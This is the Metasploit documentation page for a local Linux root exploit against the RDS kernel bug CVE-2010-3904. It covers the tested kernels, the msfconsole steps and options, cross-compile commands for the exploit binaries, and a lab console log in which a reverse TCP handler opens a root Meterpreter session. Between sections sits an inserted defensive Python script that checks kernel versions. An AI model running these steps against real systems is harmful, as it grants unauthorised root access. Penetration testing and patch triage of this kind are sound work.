metasploit-gs/documentation/modules/exploit/linux/local/rds_priv_esc.md
2018-05-03 13:00:01 +00:00
## Description
This module exploits a vulnerability in the `rds_page_copy_user` function
in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
to execute code as `root` (CVE-2010-3904).
## Vulnerable Application
This module has been tested successfully on:
* Fedora 13 (i686) with kernel version 2.6.33.3-85.fc13.i686.PAE
* Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic
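As an added example (not part of this module's documentation or of the Metasploit code base), a small Python triage helper that checks a `uname -r` string against the affected kernel range stated above, so that a defender can flag hosts still running an in-range kernel. The upstream version is only a first cut: distributions backport fixes without changing it, so a hit means "verify against the vendor's patch level", not "confirmed vulnerable".

```python
import re

# Affected range from the module description (CVE-2010-3904):
# kernels 2.6.30 up to and including 2.6.36-rc8.
AFFECTED_FIRST = "2.6.30"
AFFECTED_LAST = "2.6.36-rc8"

_RELEASE_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:\.(\d+))?(?:-rc(\d+))?"
)

def parse_release(release):
    """Turn a `uname -r` string into a sortable tuple.

    Distribution suffixes such as '-21-generic' or '-85.fc13.i686.PAE' are
    ignored; only the upstream version (and an optional -rcN) is kept.
    A final release sorts after every release candidate of the same version.
    """
    m = _RELEASE_RE.match(release.strip())
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    major, minor, patch, sub, rc = m.groups()
    is_final = 1 if rc is None else 0
    return (int(major), int(minor), int(patch or 0), int(sub or 0),
            is_final, int(rc or 0))

def in_affected_range(release):
    """True if the upstream version lies within the range the module targets."""
    key = parse_release(release)
    return parse_release(AFFECTED_FIRST) <= key <= parse_release(AFFECTED_LAST)

def triage(releases):
    """Map each release string to True/False for quick fleet triage."""
    return {r: in_affected_range(r) for r in releases}

if __name__ == "__main__":
    # Constructed sample input: the two tested kernels from this page plus
    # some neighbouring versions outside the range.
    sample = [
        "2.6.32-21-generic",          # Ubuntu 10.04 (tested target)
        "2.6.33.3-85.fc13.i686.PAE",  # Fedora 13 (tested target)
        "2.6.36-rc8",                 # last affected release candidate
        "2.6.36",                     # final 2.6.36 is past the range
        "2.6.29",                     # before the range
        "3.2.0-4-amd64",              # far later
    ]
    for rel, hit in triage(sample).items():
        print("%-28s %s" % (rel, "in affected range" if hit else "outside range"))
```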
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. `use exploit/linux/local/rds_priv_esc`
4. `set SESSION [SESSION]`
5. `check`
6. `run`
7. You should get a new *root* session
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
**WritableDir**
A writable directory file system path. (default: `/tmp`)
**COMPILE**
Options: `Auto` `True` `False` (default: `Auto`)
Whether the exploit should be live compiled with `gcc` on the target system,
or uploaded as a pre-compiled binary.
`Auto` first checks whether `gcc` is installed and compiles live on the target if it is,
otherwise it falls back to uploading a pre-compiled binary.
## Compiled Executables
The module makes use of two pre-compiled exploit executables (`rds.x86` and `rds.x64`),
to be used when `gcc` is not available on the target host for live compiling, or when
`COMPILE` is set to `False`.
The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar.xz):
```bash
./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c
./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c
```
## Scenarios
```
msf5 > use exploit/linux/local/rds_priv_esc
msf5 exploit(linux/local/rds_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/rds_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
[*] Writing '/tmp/.kBTWC7E' (237 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 172.16.191.149
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400
[+] Deleted /tmp/.zEAOL.c
[+] Deleted /tmp/.zEAOL
[+] Deleted /tmp/.kBTWC7E
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.149
OS : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```